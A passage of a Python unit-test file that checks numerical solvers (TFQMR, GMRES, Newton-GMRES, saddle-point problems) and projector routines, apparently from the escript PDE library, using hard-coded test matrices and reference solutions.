-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
out=dot(A,x)
for i in range(size(x)):
out[i]/=A[i,i]
return out
tol=1.e-5
for i in range(size(b)): b[i]/=A[i,i]
x=TFQMR(b,Ap,x_ref*0,dot, atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testGMRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
b=dot(A,x)
for i in range(size(b)):
b[i]/=A[i,i]
return b
tol=1.e-4
for i in range(size(b)): b[i]/=A[i,i]
x=GMRES(b,Ap,x_ref*0,dot,atol=0, rtol=tol, iter_max=12)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testGMRES_P_R(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def Ap(x):
return dot(A,x)
def P_Rp(x):
out=zeros(size(x), float64)
for i in range(size(x)):
out[i]=x[i]/A[i,i]
return out
tol=1.e-4
x=GMRES(b,Ap,x_ref*0,dot,atol=0, rtol=tol, iter_max=12,P_R=P_Rp)
self.assertLess(Lsup(x-x_ref), Lsup(x_ref)*tol*10.)
def testNewtonGMRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
class LL(Defect):
def __init__(self,*kwargs):
super(LL, self).__init__(*kwargs)
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
self.b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def eval(self,x):
out=dot(self.A,x)-self.b
for i in range(size(self.b)):
out[i]/=self.A[i,i]
return out
def bilinearform(self,x0,x1):
return dot(x0,x1)
tol=1.e-8
ll=LL()
x=NewtonGMRES(LL(),ll.x_ref*0., iter_max=100, sub_iter_max=20, atol=0,rtol=tol, verbose=self.VERBOSE)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
def testNewtonGMRES(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
class LL(Defect):
def __init__(self,*kwargs):
super(LL, self).__init__(*kwargs)
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.41794207085296, 0.031441086046563, 0.882801683420401,
0.807186823427233, 0.48950999450145, 0.995486532098031,
0.351243009576568, 0.704352576819321, 0.850648989740204,
0.314596738052894])
self.b=array([ 182.911023960262952, -1.048322041992754, 44.181293875206201,
30.344553414038817, 15.247917439094513, 24.060664905403492,
27.210293789825833, 47.122067744075842, 199.267136417856847,
-8.7934289814322 ])
def eval(self,x):
out=dot(self.A,x)-self.b
for i in range(size(self.b)):
out[i]/=self.A[i,i]
return out
def bilinearform(self,x0,x1):
return dot(x0,x1)
tol=1.e-8
ll=LL()
x=NewtonGMRES(LL(),ll.x_ref*0., iter_max=100, sub_iter_max=20, atol=0,rtol=tol, verbose=self.VERBOSE)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
def testHomogeneousSaddlePointProblem_PCG(self):
from numpy import array, dot, zeros, size, float64
from math import sqrt
class LL(HomogeneousSaddlePointProblem):
def initialize(self):
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.100225501676291, -0.308862704993209, 0.064097238997721,
0.253012436539738, -0.346223308561905, 0.2425508275422,
-0.194695862196008, 0.09451439391473, 0.302961126826511,
-0.236043777597633] )
self.Bt=array([[ 0.01627853113636 ,0.06688235764255 , 0.004870689484614],
[ 0.062879587145773 ,0.038798770300146, 0.022155850155616],
[ 0.09312121957248 ,0.110244632756116, 0.14053347386784 ],
[ 0.059000597728388 ,0.090986953740106, 0.035316011834982],
[ 0.091209362659698 ,0.13205572801294 , 0.069462874306956],
[ 0.077790176986096 ,0.133626423045765, 0.011149969846981],
[ 0.01407283482513 ,0.094910926488907, 0.133498532648644],
[ 0.025728916673085 ,0.102542818811672, 0.13657268163218 ],
[ 0.071254288170748 ,0.071738715618163, 0.078005951991733],
[ 0.049463014576779 ,0.103559223780991, 0.003356415647637]])
self.p_ref = array([ 2.580984952252628 ,4.054090902056985, 0.935138168128546])
self.b=array([ 123.322775367582238, -51.556206655564573 , 16.220697868056913,
6.512480714694167 , -5.727371407390975 , 4.802494840775022,
-4.171606044721161 , -1.862366353566293 ,74.850226163257105,
-118.602464657076439])
self.Sinv=array([[ 9313.705360982807179,-5755.536981691270739, 806.289245589733696],
[-5755.536981691271649, 4606.321002756208145,-1630.50619635660928 ],
[ 806.289245589733468,-1630.506196356609053, 2145.65035816388945 ]])
def inner_pBv(self,p,Bv):
return dot(p,Bv)
def Bv(self,v, tol):
return dot(transpose(self.Bt),v)
def inner_p(self,p0,p1):
return dot(p0,p1)
def norm_v(self,v):
return sqrt(dot(v,v))
def getDV(self,p,v, tol):
dv=solve_linear_equations(self.A, self.b-dot(self.Bt,p)-dot(self.A,v))
return dv*(1+tol)
def norm_Bv(self,Bv):
return sqrt(dot(Bv,Bv))
def solve_AinvBt(self,p, tol):
out=solve_linear_equations(self.A, dot(self.Bt,p))
return out*(1.+tol)
def solve_prec(self,Bv, tol):
out=Bv*1.
for i in range(size(out)): out[i]*=self.Sinv[i,i]
return out*(1-tol)
tol=1.e-8
ll=LL()
ll.initialize()
ll.setTolerance(tol)
# ll.setSubToleranceReductionFactor(0.1)
x,p=ll.solve(ll.x_ref*1.20,ll.p_ref*(-2),max_iter=20, verbose=False, usePCG=True, iter_restart=20,max_correction_steps=10)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
self.assertLess(Lsup(p-ll.p_ref), Lsup(ll.p_ref)*tol*10.)
def testHomogeneousSaddlePointProblem_GMRES(self):
from numpy import array, prod, dot, zeros, size, float64
from math import sqrt
class LL(HomogeneousSaddlePointProblem):
def initialize(self):
self.A=array([[ 4.752141253159452e+02, -2.391895572674098e-01,
5.834798554135237e-01, -3.704394311709722e+00,
5.765369186984777e+00, -1.309786358737351e+01,
2.522087134507148e+01, -3.393956279045637e+01,
1.046856914770830e+02, -2.447764190849540e+02],
[ -2.391895572674098e-01, 1.256797283910693e+02,
-9.188270412920813e-01, 1.300169538880688e+00,
-5.353714719231424e-01, 2.674709444667012e+00,
-1.116097841269580e+01, 2.801193427514478e+01,
-3.877806125898224e+01, 3.063505753648256e+01],
[ 5.834798554135237e-01, -9.188270412920813e-01,
6.240841811806843e+01, -8.176289504109282e-01,
1.447935098417076e-01, -9.721424148655324e-01,
6.713551574117577e-01, -3.656297654168375e+00,
7.015141656913973e+00, -4.195525932156250e+01],
[ -3.704394311709722e+00, 1.300169538880688e+00,
-8.176289504109282e-01, 3.604980536782198e+01,
-6.241238423759328e-01, 1.142345320047869e+00,
-3.438816797096519e+00, 5.854857481367470e+00,
-4.524311288596452e+00, 1.136590280389803e+01],
[ 5.765369186984777e+00, -5.353714719231424e-01,
1.447935098417076e-01, -6.241238423759328e-01,
2.953997190215862e+01, -9.474729233464712e-01,
1.883516378345809e+00, -1.906274765704230e+00,
4.401859671778645e+00, -1.064573816075257e+01],
[ -1.309786358737351e+01, 2.674709444667012e+00,
-9.721424148655324e-01, 1.142345320047869e+00,
-9.474729233464712e-01, 2.876998216302979e+01,
-4.853065259692995e-01, 7.088596468102618e-01,
-8.972224295152829e-01, 5.228606946522749e+00],
[ 2.522087134507148e+01, -1.116097841269580e+01,
6.713551574117577e-01, -3.438816797096519e+00,
1.883516378345809e+00, -4.853065259692995e-01,
5.121175860935919e+01, -3.523133115905478e-01,
1.782136702229135e+00, -1.560849559916187e+00],
[ -3.393956279045637e+01, 2.801193427514478e+01,
-3.656297654168375e+00, 5.854857481367470e+00,
-1.906274765704230e+00, 7.088596468102618e-01,
-3.523133115905478e-01, 8.411681423853814e+01,
-5.238590858177903e-01, 1.515872114883926e+00],
[ 1.046856914770830e+02, -3.877806125898224e+01,
7.015141656913973e+00, -4.524311288596452e+00,
4.401859671778645e+00, -8.972224295152829e-01,
1.782136702229135e+00, -5.238590858177903e-01,
1.797889693808014e+02, -8.362340479938084e-01],
[ -2.447764190849540e+02, 3.063505753648256e+01,
-4.195525932156250e+01, 1.136590280389803e+01,
-1.064573816075257e+01, 5.228606946522749e+00,
-1.560849559916187e+00, 1.515872114883926e+00,
-8.362340479938084e-01, 3.833719335346630e+02]])
self.x_ref=array([ 0.100225501676291, -0.308862704993209, 0.064097238997721,
0.253012436539738, -0.346223308561905, 0.2425508275422,
-0.194695862196008, 0.09451439391473, 0.302961126826511,
-0.236043777597633] )
self.Bt=array([[ 0.01627853113636 ,0.06688235764255 , 0.004870689484614],
[ 0.062879587145773 ,0.038798770300146, 0.022155850155616],
[ 0.09312121957248 ,0.110244632756116, 0.14053347386784 ],
[ 0.059000597728388 ,0.090986953740106, 0.035316011834982],
[ 0.091209362659698 ,0.13205572801294 , 0.069462874306956],
[ 0.077790176986096 ,0.133626423045765, 0.011149969846981],
[ 0.01407283482513 ,0.094910926488907, 0.133498532648644],
[ 0.025728916673085 ,0.102542818811672, 0.13657268163218 ],
[ 0.071254288170748 ,0.071738715618163, 0.078005951991733],
[ 0.049463014576779 ,0.103559223780991, 0.003356415647637]])
self.p_ref = array([ 2.580984952252628 ,4.054090902056985, 0.935138168128546])
self.b=array([ 123.322775367582238, -51.556206655564573 , 16.220697868056913,
6.512480714694167 , -5.727371407390975 , 4.802494840775022,
-4.171606044721161 , -1.862366353566293 ,74.850226163257105,
-118.602464657076439])
self.Sinv=array([[ 9313.705360982807179,-5755.536981691270739, 806.289245589733696],
[-5755.536981691271649, 4606.321002756208145,-1630.50619635660928 ],
[ 806.289245589733468,-1630.506196356609053, 2145.65035816388945 ]])
def inner_pBv(self,p,Bv):
return dot(p,Bv)
def Bv(self,v, tol):
return dot(transpose(self.Bt),v)
def inner_p(self,p0,p1):
return dot(p0,p1)
def norm_v(self,v):
return sqrt(dot(v,v))
def getDV(self,p,v, tol):
dv=solve_linear_equations(self.A, self.b-dot(self.Bt,p)-dot(self.A,v))
return dv*(1+tol)
def norm_Bv(self,Bv):
return sqrt(dot(Bv,Bv))
def solve_AinvBt(self,p, tol):
out=solve_linear_equations(self.A, dot(self.Bt,p))
return out*(1.+tol)
def solve_prec(self,Bv, tol):
out=Bv*1.
for i in range(size(out)): out[i]*=self.Sinv[i,i]
return out*(1-tol)
tol=1.e-8
ll=LL()
ll.initialize()
ll.setTolerance(tol)
# ll.setSubToleranceReductionFactor(0.1)
x,p=ll.solve(ll.x_ref*1.20,ll.p_ref*(-2),max_iter=20, verbose=False, usePCG=False,
iter_restart=20,max_correction_steps=10)
self.assertLess(Lsup(x-ll.x_ref), Lsup(ll.x_ref)*tol*10.)
self.assertLess(Lsup(p-ll.p_ref), Lsup(ll.p_ref)*tol*10.)
def testArithmeticTuple(self):
a=ArithmeticTuple(1.,2.)
self.assertTrue(len(a)==2, "wrong length")
self.assertTrue(a[0]==1., "wrong first item")
self.assertTrue(a[1]==2., "wrong second item")
c=a*6.
self.assertTrue(isinstance(c,ArithmeticTuple), "c is not an instance of ArithmeticTuple")
self.assertTrue(len(c)==2, "c has wrong length")
self.assertTrue(c[0]==6., "c has wrong first item")
self.assertTrue(c[1]==12., "c has wrong second item")
b=5.*a
self.assertTrue(isinstance(b,ArithmeticTuple),"b is not an instance of ArithmeticTuple")
self.assertTrue(len(b)==2, "b has wrong length")
self.assertTrue(b[0]==5., "b has wrong first item")
self.assertTrue(b[1]==10., "b has wrong second item")
a+=ArithmeticTuple(3.,4.)
self.assertTrue(a[0]==4., "wrong first item of inplace update")
self.assertTrue(a[1]==6., "wrong second item of inplace update")
class Test_pdetools(Test_pdetools_noLumping):
def testProjector_rank0_fast_reduced(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=x[0]
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank1_fast_reduced(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=x
res=td_ref.interpolate(Function(self.domain))
td=p(res)
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank2_fast_reduced(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=[[11.,12.],[21,22.]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank3_fast_reduced(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=[[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank4_fast_reduced(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=[[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]]*(x[0]+x[1])
td=p(td_ref.interpolate(Function(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank0_fast_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=1.
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank1_fast_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=numpy.array([1.,2.,3.])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank2_fast_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=numpy.array([[11.,12.],[21,22.]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank3_fast_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
